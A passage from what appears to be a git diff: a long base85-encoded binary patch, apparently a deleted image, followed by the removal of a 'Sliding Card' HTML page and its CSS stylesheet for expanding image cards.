z9}?za1%98HWh~ZTtRQPB{g?3`9GpRs`ojFmll7JOheYm*`XkxJU$Xg`UVkUzVgc90 zvT|Sd_=+d@hvrc4hINQldI*3HxbuTC)9_A@-`vZH>-YMD))sw_#HZ^=*?wTZeIUl_ zuk-knYoqn=F_W#H;Q$q-^1l(COc(1st?*)S-!qaR7AEZY#e)#aJ&49y!IPjs5E=Jqt!y9JDYeAu|DS#X?D;}uSCSaH!;%~l{#Lg77Ho`YecCA_Z=vGAPK@8#RCM1Xt0O$ zLIkOk&4BPZVl4(_(KRGQr_ahcAbN8F$N8~;w4qX@Q`Ia40{h!RP&kxyu6AJ++Vcb2hZjC zg>?(>UlDXcSj9Y`?|-<1JLl*6hp@kI?jpduJ;D*ERySSO;tCo|d*7H9xD`5p4_w5i z${QXTkrHO>Wy{&<{pKmWfT7jmBNo=NgF>nUmIOibgDTl}DzS0=#Hy{X*T5yg^>94c zrcWR~vYhHRg+Lpl7;Sh`Evi=p5(XBn%PlslWbkmIMXSUC;=6J{TB{bJajwwem$S%o z1R*Q5m{aQ4ds2<=?EUE|E8`U}4I_b$uq1?hwOVL@|pCh9axAhFESRL8(nlkj4vuhiq(K z7AUE0xn>(MT~T^Kg=y_q020)P17M1hK?+%`(t)pP$TDp7SvkS6{?!bsx9)D!0zP(zH51 zKh(lJkFs69NWRbJCrn?<@hV3_e?+7|^gozefKl|jgoV64gXSVVOZQ~~*3YUXg7foi zrkA=8n4zCFS@JMnxmFd*);AeAS>&xJQqlkRRK#NzH z#DELGOZbz8M*;v2&BbpBGD~)CqFyS~5x5kl_YJc`1DJ=h5tf9#A~Ds5C!|@S12Eu2 zr8%n(iHLBUg8()_7O9^`Ftf3Gl{T7Z6L7@6;pr2drk_MvVU1f|ONg*XZUDe)Qk{gW zrx5P~w=CmP*jBSWR;6`^T8IG2xOJhoGU-fPGA3?Ng5|HQ81F2h4plI*aIRFLmRD5( zS+YHP!o)FG83TeFQG~mWh$6;gHk*#ETn-6vRicB>7l1?s!bIW{=y^qTwlrEt=7$kd zbt_WEmo5UT7%J4Vyg;@~t-&u?w*LU>66H*De@gDxEQ;xf+p%-EA9RL* zlwP1=l=2AjdFS3al-!<_$t$>nTs8+E7das`6i$sTThLA~1F#_WtHUY>(;X2(K@L^A6Uz`DVZ!qQAer zC+pkuGKYVc@d|fW$M+mcb5FD46vbipKXiqKxi8dyVc<(g-1s5Yp~uJf2Btsgd`swM zKIg=vM#^{D{KY|#2gnl`+^~##0iv?4eKjtitzLb61}misI;2PN9jh?ir$~%u@Jy!t ze4<=c2M`Y=R28+Eji3&$-=wBgH9}vFrHN%micwb%_P(JF?-5%da<{)IL3$Xd$N=Wz zo+Ysm1%_%Z6l{kWftBeIn3*!w1&odrnjVh~%ok4j#3a_4jjlVrOJQpix}aP#Ll?M{ zRGh(L#B#2ZhY52XK!O(Qq%;n?L1-?HBa|t=BY@&@0b6yOnI4iAorPc1Z5PJJ=-%j- z5G2Rwlr9+}&FB)OVKgXRqY+6#X&l{+!&e|kHL~47YL7Lb-D|YxwbXRZujn(# z{Skb?F>B(>s3-R|E$y7XAv80quF&C*EfEV~1pCNsf&i3ja*7#$0oa;%V392QYS2u0Y zP$;&-+9;%#Gj%Cs6^A)t#)ZgIs*V=HYt(UD-CwdKJIg~vZTQVl(VHiJWuRBy za_8!!Eu`)2tHoKN`-Xc(wLYaH`3yMf1R173|LrS8^5FgXO6Yb2#S#WryXWl$o_z1Qj^RDN8?4r_7AbpkJY* zG}QyzcT$g(=#z*iX6qGlD>gi0tR%#s3|hJKc$aUnLE|bBA_UjFhV`!XzJ}~i?Y+j; z^KO}s4Lk#}PLcfcHY8R#>pg2y3{BPb^0~3-_rIX(6htUWfeKGzvr&L41O0%tjkj(6 z5?u*fvnj=PS%+{XFF{XkV9)MLZ#kHEO`2q(oNyw8zVIitUvY=@lA_FL#N0DKB>!(d z%!ZY&+-qIQ?8BmGcOzdj%m#KJP5EOKBCv`tpL;zaBVJgVv+A1+;(T=bQ@pCV3YH~) zDA~P74+eD~2ozKWeCDIl>U+1$+nV=%TZ^md?ugI_zo4!)us{ASu)Tm6EYp&n-SVk5 zl3ddkrWpEMmy7x7_FQDx^j@8(1S#IVuNJ0Q8X+=on#KcBDv2F`@AXSb%SG)0iC(>Hv-9z9xzrwofD1j$3FVt7>&dF1c*-Is; z21%p`I)2?gBTcz~s9qa<_cQ4s)`%qx);s-|>p0DYgv1u!w+l$DmiS zLIlbslhlgAhd{<3aTIlF&x~E0+>E7*5%@IALMjeeTUuSd3X{MHHcY(den7W~29T+G zho(H2MPDN(2xsrz>&WmYRf{DObh9MtC}F9PZ}Bp>fCude9M{Ksx}DB)Xc{>yW|<#v zq;S(I&#PuLQxk;VtMbh>hOfg?#lU}Av3&&oUbYgb>iG%9QEZ>e%yc+ngZs#HlOO&M z@Y^?#ZFWK9mtd;`{}Nr3dDo2q~{Jy$I zJ*M$m(RVa(=>B0a!w{txmO;zOK>tDIGjhkHG@)1C0UMRSggFrv`r_bBwkCHlj_PSn z&9~KFi!O@4UOR^TRz=*RL+*Bomm;n(EReyql+xYnDfQ_sGWpa|YF;O4jK{NIy=O-y z3Quib7s6k8hMSP_D{sc1r#GdSbB;oyUb*vjkx5fb_46z=piH=z45V8FdwTQvu<;UXAt-*X412GWk!pKD_+Xy&T8iKTV@?qV_2~Yb=)8SP-Qq7a1X^m?~kBq2zj&+m(Ro5ky&766>Gq4 zg85IMwxeFY=>5F2{-3d;FddR!fs5FM%w>;oODCg&iaF~MY{={Wl;ZPw-|WDI2??hY z8X|qy@gLHcScWnVDY#8h$D#PDbG~i;mD)RS3~`s6j(v7T*L=U)H&G%mhfPYLQx2&s zYFp$W*AgWgXYS-~-!~D;rT14q8@5d(EhUq0AkB_#p|MGOSuz$YyVCsMsvfk0Z3cVK z7Gk@4z@xE9?NI@l$k63&r6`*Xlp;;nX89`t-dcuV5y+)3b!>b8O-<=Grf2>K@ckH> zm@o9Ya-dDzdmlp`C?#T0LnB`ZQ25;7`Ne_C7eKF=f?&b~9Q4Sa-BpVo_m-@w94)|l zREOY31!!Cesp@^4+=U}G<>g&@Kh-Va39G5b+QMbh9sasZ@N$nF>Je6qj-LOIbY1;6 zDH_@Nz7+g`vj4oNq8a>1akFN~7ZQ7oOoRX2DlWJ1n^TOjR{4Pv&WhnK@K$;75Zi-k zYCC>0tbe=0<;g~6p`{K_Ca0(7oADbvd>rt#Q*xLetmHyl{zze3@;xb~>G@xe|w07cbkK8dL@-b{DcT2z?Rze$0N45!inDppSzhcE) zOrClm+3M-8CdP$wdkW}=(e+4hnvtEEiH64Fn12leh(!lkkp$n~j3~&LGZ{_u9x^iD zCR5~Lm#@AG4n9davoCaTuY+C^Yory>HOG^cSIro00*KYME-YJct7Ve zXELt>MP?p_|Z@}g#H(nvDms&~F^gJbW?;^f*^(eAz{In=I-7SCp zDtVhi(B}2kog;i*^(WfAWbsyHn}GDy!4TN$+g}a0Pxja1cvi;dbMz>$U-a5`fEKOo z%|!BH_!H871I<@o`Y&V6laFtu-l_U+6Te-ftM-ki```OL?;G8n3a|w;gMyoy+5eU3cH>z!n$+CCo~m0VAKdpwD7j~5CP*sqtPsmrik{^{}vl9s>*`$L)4mEZs;rt8rShZW z6T8x~*wDxruN5AL;t1)W&7M;z{!WPRCNj3ZFTc*Sg2E4c(Wm>S+LpeW%*8qhhT_2n zBNyAIQf$Xx zubn-?;{DV)*%j`Ijjqoi6F!3|1CW|e0&n{REBIyJqEhU8PbYo-^rz%{cToBq&tF7R z=cGD5*Tf;h9s*Y8Ic4nG~58aGKMa^q{4qTZ5 z+cwnpWt~jnB`~O(<1!p34sU^3FhV<;`V)@AF{PwPw+!|45&8_DUNzl9!|q^lac}Kn z^SHikBMI@D%T%75x?Rl%;~ zr?s7~%>jchsoUlBM){LFvIlT(8f*!zI(1wNJLXdb_Q3NutX zvh6Y9!J5>fVha)F?3tSeQ3;u8=;uzx`Zne=oW{aV!Gx{pnsj~X_^YU)fq1IC96~Yn zVsxfaK5j3&)dyD|OpL_Ge#v4aKP`avkF`AmMK#O6=8Ir0{sE4t2&$eTQfI=rW?>I; zKUxDBpIa@2)1F z96pMn4D2MsC+G0NNw@D;q6$c#b?R(j{N9gtMf=)f($-1oylB72d_<2KM-QdIY+)bM zBM-2vU`d8ra>;2HOu*`qPjZp_w?dZI@Hl~U z4*A})AWWGqlCccyY-N<4uBPowBg5)n-&2oT;2ttVd&;)X%k>PZ-rSqcG!EPc#xO?c zpV8{^{)hEdGH5_?u`syxU24^;T2|Svc*DOFGhwYtRp`7HWoLnXK__|Z^Xh&^=^wND zFbf=k%O?K&<0x6#p-_A{#5sk14&S{>u z5EHLQw|>KjA2M8UxvaZ6jS5WX#NDN7sx^sr2(G7(eXi1bD<^)j(gSs3(J)Iav12J| zs#h#1F-JRJAUT_m{1Z+MiN&aR0UPWSwL{_b6*_M-efV7UI*5hyv6w7{--eh7sTOM6EvK!vWnCv0{i)Dda1JW*Z;k@R&y6|Bw_m)#Jk*m(3Sbh! z_Kyge3TEvH7kyG&&fjV3xQM+<=ccs~ELqMRCtK`w+=q~-SUy!|a^`hrkrJ&Te;tFy zeqnN_YS4aa`6xCb&DN}4`lr${lfQ4!X+GfMJ?*2U)cpQ}30&c3gVSsBpg!e|1wN1E zzX+ibwYJOFk5O~O#hwqt#RZXFmTy)hl0KYh)&L?_f4-7}CmMbA9}26w&-4Z++wmQtxq*qa_eBb6C#uFwtdn9*dJ{SF+M3cAT;Y+6z}TO|Kb-B2z1 z$?;0BzvBf(pd^2o8`EBS)@+ZT0r!_#nliATftw`cYa{G^&arnMg!93}kl}@=EhUa@ z{Ga~;C|>GNJS=1LboX@JvB^KxzrEIYz7b#a9Lx6_tDnluQk|u(Td(j&vqkeDE^;GI z@!iZd*iq^qz!4aAc3JQ`4WdHahxEA8XXkJByy$K41O@R4f5-PaKOctQ?nrI+mxP&5 zIGY{_R7Jh?a4s6>FN6H=+M!n>r9&?J86BELU!xi8mmL zzoq;N%_vgubHz(@_dd?0Oj{Y#I0mn*=Wu@IR=MiA++)vFIV0S|RXzI~>BkBU&r3nR z_-`=S7j7|DnWe}0X81Skb;Rp@vet!J*NXDTA9tJh?ez2wjq_f}fnr}poZ)1P-oq^W z84Dzz1?&bD75)}l<#he>K(Jcrjgv7_w|-9=e!Yu$Pxd%IcT`u8-i+{1+fu(l6-iz4 z>A})HcsfJIgNrQoBNnK037UHs8iM;^T*?WURDWg+h9Zz=PS4>^yN*C{zF+_%&<}FW@Sr`_ReYLu4v@ z%PYLnnZ{9VOJ}DKjdiJ{F>%%{yE86Qn(wDTFvy3 zaGUyd+Ig+9y!bx(qeUst@**)<0IaPHX-Fb|U9{1%KKl$At6#IPYS7NQD*31vAJ<4QQ(LK^dz_5(?eY(EHI|?4$JCgqT z#l2;U8kJ)u*TnER>7N)?y~l)~zA;pv^5xBPADJVI4_d~xFoIp7&GMNajN2sJGT%7% z7o|${wGTv0u5W#XPX1{SZIn3wBV^+xHb4x{*nI zd(YW5tuVEBrU11fXbEpfr7J9JXFeg5;N)lQ8N$l*Zf+g}{6_w&LN%J<*9Q4YnQo7Q z*PYv}`cgg^kdmxZQ#2=B#&dW514NcnxZwTKi<~hfnDiN)Pxs!1v1SCH6z)2H4L?@} z@i%%Mw7xQzGS6e7tWT~*fXsanlA}Mv&Vt8;+rCpDLPsKtof6FFD|bXmBdY=@a7BUc z;ph;*a(THv`yVpNj|^{lBIi(PyMrH^og^QwQ;uh5nYmGyQ<boCSaTN=VDn_pS|>^=0@1@15}O2!CfxImaB#HHsIm zNw8;WMV=G)v|BPhH^-=s*i%KHOC}R3remj!%--Zh&Et>ohCp zF{8auyRF|`SuV${RtP31DN{M&oD_e_Zv50ZMDu#66@?FKNKrhJAV+55@VZ_}2-{j#>rOuFxx`(G>+?)`n zRN-BmgpU%~z;vT5VmkY`TJ0P^+c&+K;P*hjFhQb==ZHc-YFO=eh6uV1!}%ne^p_kw zdrKWH%gvPrdZDsMMtw>J+0OY-0DtjJf!=?bee?ED+ZTdNl-z&1@z^PE9KA=;CgHgL z#N`1;9zK>#m$dq|?)pk8c97dzo(Fk#(^mYwxXoQEnGU6Oc>R{PZZ1Qvzl ztgA&@1s7$uP5a^XlRzV4j-M`2zD&GfiO4^I45k1=b)a2`kl4w{b*iX%Sq2MnlG6SM zVE+f`$%Osn8epi{WcCE%beM@L4oe@!$v1|mO8)8CHhJ`1HjcNjhSJz?WWlV~gQ8JK z&GPWJxbP021!y^|yKR-WbchYzK==CVmv6HOo#l%@e6CID87g=|rv1bL-Lqt6(h5-= z4Q`1wRz!&8ONrgLSqlUh9Xum4#uJyc00(GHV&JH(r;W#nA*#<&%(H!(37VqUz3fV{ z`uf>b@tsLMB66UN`}GHK>kCe}P&e=rx^o)yD6uyF^{?|R>)fZ^#`S;DgR6)an#9br zr}2Fu^B-I9BXhWNowAw(B(uj@4V3=caHxggiaJ|BI}^Ot6kusI|eM2k)r<4!mp`{UbVV3v+kB2O7s}JSn+3 zGv9mn6r@av#}mHJbKq2Bq7lRq?uRUy=#O>}ghh+=HK>+vU0ZV<2&L2v#!_aBFJpE6 zlFxxFOt(wNM9$HZF|Og-Ce7aUrB86C;zT#0j)vTY`q(fbZRW=r7yI=bcA4|fC!UmiGC zw*AeNiT^HH3HjxCIn`)z*;65}vAgG+k^is|rf=NE8J_wr6V$a@&(st_)h-bfq~L6g z*>zzVew$psY*kGA0#AWt4>nuqZKmCa%lN6Z5}_&c?d0=h7$~28@uoD=`X=$@WMGhy z;HkO3<>(tvu`Ke&C6@rK;PBLqPD`VLf(sT~G2aSwBDEyanrZ~EP=uuR{{s+X@HRa7 zZ{Bu@@`!~~K<8;%^apOWLhXCEzehV=i*Y>CRxv&I3N4FsX%FFvHpS|hF5+V>U>f}- zb~5zj{ppt}mK;%+un5Tez3YUs2y}N$rU2X`CwBg3Sb;`mhVZRt2M4Oi4aa|`Da_ht%1f^r{T`LHZf$&k!H2_;hf(;Io20#0Y@%Bgj;AIcSid!<=;Y%^Q-S}02Ziobp z_>|4Nn9(nOAT^cjFAwH|coq_N-qu(w00^!37E)qQ^*w;t&RnU29R_|%r%>ZpJdK5U z|M8T2jtAR(?A`-hHN%BxeVTzG$8RukIn=gfe^<2ZSPyo|+}1oIY#hdn-qTv`10Wv=YSk0YA9y*C&uB-uKIjD>rn53G3QXA7;-ObIi({4xjFnP!M|D0PKmdB zM?S)k9Y@NJ6J{p?I6NYaAz;F>aVlcOFnbWQdG1V0kYxp`R>A(f?$CdHNl0XM%a(xM zH}j$6m%3*rSN6E?gfze+Lj#lPmarYGHZr(*B41L^pWJXCI_KXM^e7)*h=SCI2&D$# zJ6gTM6k$6|lYv~wFuMEA>r%i0 zMs37Dz#5oFg6w-yiRymdq521yp82EuD<<>Tm!ukDg)VsWugS%B5veFX{H0r1 zTw0gu;$Wj~maK)Uc$&Zo%CP4?2-nico56!~nt}-kG(>q6Z2n_}ZF>gn}y^(aS*K}Vzap8Z6%IVDr1J7QAz zQo@gVyX2k88S)b}%w&Q&@yPMK^W0vuyO5Z(awWBX9O^&UI2MU0jLcOL?I9O=s&mN@ zLIkm<+Mq_=3?7dZ-zO5}_L?$T+qoA=c%=LGTofOST?xx&7K=uVutbcn5AE9HK(s^d zjVBPXG~OxQcTliwej<2Ei1U=yCGA5#CMvU4<$t z^$>&^bmeaeK8Y1njzrcjy55ZUMu|TP;+76}StRH-bd&&ALXSGB#w-~ysNp7F5zvZ! z+(zd(H{qkf5lLY5ya68A?T^(xd}K*D%|^YnTEoMs1`y1B7v1r~n2C?0xnb%bKmxKg z^nRTX)G&K2IBm(~!%%&e7Aka)UMOuUa9B~JK0%$)fO|=KB_IJ0gbGXRo!#i#(a_&# zdAQ}PcY6J+leA>ImLBnTYx|U;N+do z5}*Ms4z(7XE7>l1%5?um z>qGEm%zyCPYuH@(_1%^&m0E7uRP1#?r|gT?G{t-F6r((Ahrl}oul{?kFGcgf>nJ$JaueQF)tnbkj-s-1UF8<#Y0H_m*S$XCth-j3Utz7wzGiz; zNtY`;@K0#3g$8l?BDqyUu1eku^rsP@^t&eF-S6I+6lHu^%l-0UtGAHDOal+RUh5N& zl3S*0JW&W=&~sM0EeQr@&Y5 z=m?#)rW2~>HTZM1H5skqEnYj;lg8kZNB%c~BpzpB8eJ5O-y+8NkaX7CS?-CKnP$n$ z^Bx|nWCu#Q5wuY(5J>|GHj<#VaklXijQvBzA`mmX*f+z4#A-F#FyBqR-|?FV(3~yT zVW%CYY;T5~UAwWr8Rg#>(gJVxZiZXAt@}RYf^ydk+-fn~!q~6O%jD#}{yL#7)-nL` zMK>i~lg4wGb$sJNMf|75&8*gm2&8tjG9P_Gna7|_5FS&}ZYm7h@D$eTTr|m}yH+OZ z4R|9U%feuPm$RVL7vlC*6(M|eGv#cLAnxgU90vTA`8R$`zU8qHvs4z^`1#11i0@9ia)Os{FBT~^XDRsOtXeMLLnP=AVu!RMiTJ>YwUSBe0N_#|N3uZIm z#)z}Ytk#%+kbqGO@%`TIie>bAmt2Jr8;l;YElkIfpE7Md5u9YJohtC9s&Y(*dYqMH z5NPp4eAU*udvxo|dQxa^>XVz;XEZ~48p#Jv^j~m<$xtBEMr?`^K+NS~n`&e^Thk!# zxVh^656jVA4$R0665fMmEJ|^6nVM{gR1 zAUvo}W2TA}%}k2phuZ0U#U!1OlrMTs+w$_OrJu#-(kXGgj0uV>Zp8GI$&Rig8%FY@ z2``sUXz>m$wk*vkP91>vMp8ABmJuX0-!<<>6Oc|=IC(Kk_xhJGbixd!ZDzjFjDMc$ zcp_zYZF}w9PMVXd=WS9^ZmxoAtPT47k7xfYMq;C*QNNd0Oq@r<^(nX;xW#Ak(w^PH zy3e|7Ir;GmrKfSJx41x|*Iy?DhrHv|MtVFZmiul#;f8*m3uZE2AjQ6)a87?Q6ASv2 znaH~(#aaz!Ci(y@TDGT1N}!T$@i(3mac1;|ZplGJ(gZ)ACQB-sxo3M-O;156CPR*b zKQht%0kwS&`<_c6Rcf8)XF1Kki*oPz)Q`cNsfgXrn}sDTI#s!8uPo|myFdiiL<+RM@H6XR)z@pPy4tR26+H~ z5_rLkY);+xU2frH7ellH1_u7s8;6MsK%^}A~zgNhEE%*AldA6wXaan(=z0sYRY(< z-7cG#ye-d^8;i=bDkOgc;rG3DZYz)R>(Hjaqo|E^zol*6n|9)fhzPT@$?7xn;&Yc76zw+TM z?Y|RNn$JbqsAeSIVam{Xo&!7I8vaQ&Vq8dPy$$|I?M+1|*m=FI!DI>fv0#pf+&_^> z4S+`ak|4A`-Ib-&19`SsZ0#Le9OGgYpUCmza6(93zN#_qbn8N03p*{ZKm8AK zJQW;8B!| zbk&P+>q45w7T%Z1N7}7^cuva|Q?h6agaA?+O5uY;(wnAxEe?!w&QRFv zyYo!;+uG8lZ4T;xfIzCd`Gy#M^33dS?c`G;QjjujU8;(y#_{_^xv5G;7i3}y#cDxV zwCJdvRZ>NzTt0PKtCRjAs74)F|AmWb*IGOLD7}@Us4#xeiILGrSn<7j0aG*1NL*UK zh~jj%jKo-bH|tyMrjhH#An=iDN%!SD)d;p6?E70ldQ~q{QCD?!Ge7cn8`0y2B?Y0pTlU&R zR2cgQWQcI6Iw2hkLRe~3}bP?f` z7S(@{m@*!YkaUgq&!y)qm+rwo2?*r#6Yo|mO8YX0?DR|@oJ-LjdbnP%+R~n?QQ(&+ zfIRcVEw<~Q+vWw6_Onj#wZj2Zj$y!j%{-f7i%&bjxQNMmC6h_5{s0r-g_5$cR@gBAp;C_ai9jbr?-fc^IKDMIrJ;iliWmx9|btzT|!4 z@S))&vR$Zc(5D-R<3cYqi%-S~WsA=q1cAcc@{Ub$agR=@-iTrD0U``=_TiaJqXWL= z^Tc`TG6i81BJl<$KY74`!uGEKi4^-PM>!auCM*@n|84Nl(MF!Mi%&O=bK!26*Qlkv zpBVOBWrG)oS@JzbCrYqUa|}?3s*^pW6uP{0X$^`t;?<> zaXBj>IooUw;yGe@DP@STPiOp0t`zB`xy(uY4@^k%t>D$o7DORIPR5b-WmxTpuD=B* zb}2S1mDmu>5U;HRfir%NnY>=l>3YiQS1g&O!g1kC{V4hmT&eoFu1JxW#Zki!YQbBP z<~-K;Id3YBCT|rV^iAKmbWTs7cB66Wcv0xJ-M#uS;)TBIa}2;IdF9*;nD)$3Kf4vR}|qo6Frb% zm0UQN4-qGn!?I-QuhOI45pFWdr1mc5l^5%@l|L5#Lp08sLDNqI{&bT;FCXzX=!DvO&DAMd00~6>KYXvt>(Nsqn(p`_E{Da_6UYvO>DsU^9fn-zI@I5V z5pGI&SeOe42xZS(mFq>IwvwanlZ~WrQ)Co+;Eg7-L=8si0elro(HWR5j|7`E85aEc z{+^}wN5^Z%>O(_ zb{i46C=9TL%{3n|U6+j(fWFT2==43@Oysy=M^J2;Hi8@hsk!{j8yzeENesG*k!zBx zDWK}~5r{yk)rW~fHkKp=XbtOuEp;UfyRXbBlTiJChHx#wdZwVAX3L~UNE3XUdLwmx zO^Odz>uTq;PKgruugC(3oaYqXsO_R3FdTk4qow;KB_F{eMy@VBp5%5xdl`IWTc1>d zttPxjKkj_EF+_~Nh3GDrITCt}CnC918!q)_iz+v~rPc-Rn_vTp9Ki@e31hS2r}NVy zj?EHqW&$bbB$r(U1qDB1(X|(z3*2jfk&cuRm1$7%c^OgH(Rt7Th7=xun#$i8b$_hp zKd?pgI`fsuI|OHIx>SW-Fx^(xAhDZAZ(Pq3jsOAT4!Caxz z_@U#{Vcz%@mmBiQcW9Bb=tZ+Hoj+oZKMN6!3lSM=G=2Z;R>nclJ zwUnkMH;$;Clz7EcX=MxmTBKDF2#Xm`;!bbCa~rj`K(cn^bgfaf!^+h4OO4*bmR3!m z%jlLCODY92vmJRrAqyrK;tuqGGya0LP8iT4p;EONqBHtIoqsz}vX!()R15AIS0~Am zCfa4IN!-9IFEmE3)5RJG=P7EU#tHEkg7r!Clhw5Se-y|L23^6rs=v_A$*TG1DX5O5 z_s5f}V(&J8@XRgWK27CqLKFj3V| z^_3xidyAWqBjdS8($uc8Kmn{jArh?hq*jBCV=O$VI^004gE=258Ho1DnfGCE4Cn<{ zUE=XMZx2rekid8;PLw?GJ!dDgP-Z)W+@hjxT%s+zD^{-t$nl9B^$A?`xJwLgqG3oY z6!?t*Z{P4PP6;AT$z82qSVuq+tI{@q=8QZ#Tjc4mLOwQs+%97N4FG!{vmv;3@NAF7 z?_pGd?6&9&U+O&0e*nIbBY~G#C%nBs)8f z0l)?iS)IBCU5#I)%ZZ-F3C^Q?4>XUbx{xCUV4XCmlY^jL0(TRM5JRu?;kp zjsrcci7g0Zp0aOpkpd=-hLh3O{un9z2cXP4;ak@vav{?k=)4p72Z;OqUJt)KOw-y= zBdevRf7*K#9T$^7EOeRRE@9H9bnNgLUJri>t!UV_k(-hWw1k7NUjpz?6FYK18=2UM?g{bLp%CKztbk_^w zG4e-R>wQHM=w8;>bKlIMJV@<1PET^qVig2aTE!M<%)37~q-eR44=s||E<}E`BCHtt z+6^b2vu%~$$%Pht097~8lFbDMO`li;OUe z5s#uRy3oQL*hhsj`cbnJz2UwN^3`U<-sz|{1I-&ooF5tuAHr?mPK)uyIu%6(Gt%qL zO4^jB>m1Qhrb(^``3m|z-KN&|QFHQQW$$}~?$lKV#OAmP!i@`MSS!Y1(n8(;QDeRBx_qfAeuaX^7_ z*IZJ@q>&Q~jH=#@1N zx+4*(G~&penMdN(;|Wc@LN7)-*R10QrP@>h=_7pwcs#Vjp_{XAqA$a``X8VznZ^m2 z5nlz8;eZ9D)D?2hvpzmy?&!G;FIX>^AXJY5Fw#mrZ8dDANQXhTWb`GH8!DWk_z9-hx^m00G*fTu0S>ixv5MVC{U@>MKkSKXM}%-YJw}Hkz(A?Tqj|N&SNv80k=X zDZCy(jHZbCLe%q`8UOr}bAeF`ju}dkBZh-gkVV?g0^p`*W0g@cg@P(R*8N9{j2s7vmCDWVi!a1-B zu%y@s!BBkRI!+4tUWitZiHVO0h=p=RV7RI6MmnLPiau_ugi2eZPO@9fb!Cdo0%G4D zu2F7mET%p6H~(?l$A~>JiGdM9w6Xy{Y{73q*l>u-rfR3FbuZ>YjE0TTng+`#m~@Tv zpV7>|44IUiozd6QE@$%BYL}>_cM>qrm}4BS;4R^=8+T%stimy^%uClP95F~2zTH(`!L5qQ41|QeS@*KCRt(r pLS{W`WI&>P8liG8OH%f^viJ=j2mXZdIV3L_C!gGjEJpwP_CGzZWM}{Y diff --git a/test/SlidesIndex.html b/test/SlidesIndex.html deleted file mode 100644 index 174bed2..0000000 --- a/test/SlidesIndex.html +++ /dev/null @@ -1,64 +0,0 @@ - - - - - - Sliding Card - - -
    -
    - - - - - - - - - - -
    -
    - - \ No newline at end of file diff --git a/test/styles.css b/test/styles.css deleted file mode 100644 index 44bd14d..0000000 --- a/test/styles.css +++ /dev/null @@ -1,107 +0,0 @@ -* { - box-sizing: border-box; - margin: 0; - padding: 0; - font-family: "Poppins", sans-serif; -} - -body { - background: #c582ff; -} - -.wrapper { - width: 100%; - height: 100vh; - display: flex; - align-items: center; - justify-content: center; -} - -.container { - height: 400px; - display: flex; - flex-wrap: nowrap; - justify-content: start; -} - -.card { - width: 80px; - border-radius: 0.75rem; - background-size: cover; - cursor: pointer; - overflow: hidden; - border-radius: 2rem; - margin: 0 10px; - display: flex; - align-items: flex-end; - transition: 0.6s cubic-bezier(.28, -0.03, 0, 0.99); - box-shadow: 0 10px 30px -5px rgba(0, 0, 0, 0.8); -} - -.card > .row { - color: white; - display: flex; - flex-wrap: nowrap; -} - -.card > .row > .icons { - background: rgb(74, 74, 74); - color: rgb(255, 255, 255); - display: flex; - border-radius: 50%; - width: 50px; - justify-content: center; - align-items: center; - margin: 15px; -} - -.card > .row .description { - display: flex; - justify-content: center; - flex-direction: column; - overflow: hidden; - height: 80px; - width: 520px; - opacity: 0; - transform: translateY(30px); - transition-delay: 0.3s; - transition: all 0.3s ease; -} - -.description p { - color: #ffffff; - padding-top: 5px; -} - -.description h4 { - text-transform: uppercase; -} - -input { - display: none; -} - -input:checked + label { - width: 600px; -} - -input:checked + label .description { - opacity: 1 !important; - transform: translateY(0) !important; -} - -.card[for="c1"] { - background-image: url('1.JPG'); -} -.card[for="c2"] { - background-image: url('2.JPG'); -} -.card[for="c3"] { - background-image: url('5.JPG'); -} -.card[for="c4"] { - background-image: url('4.JPG'); -} -.card[for="c5"] { - background-image: url('6.JPG'); -} \ No newline at end of file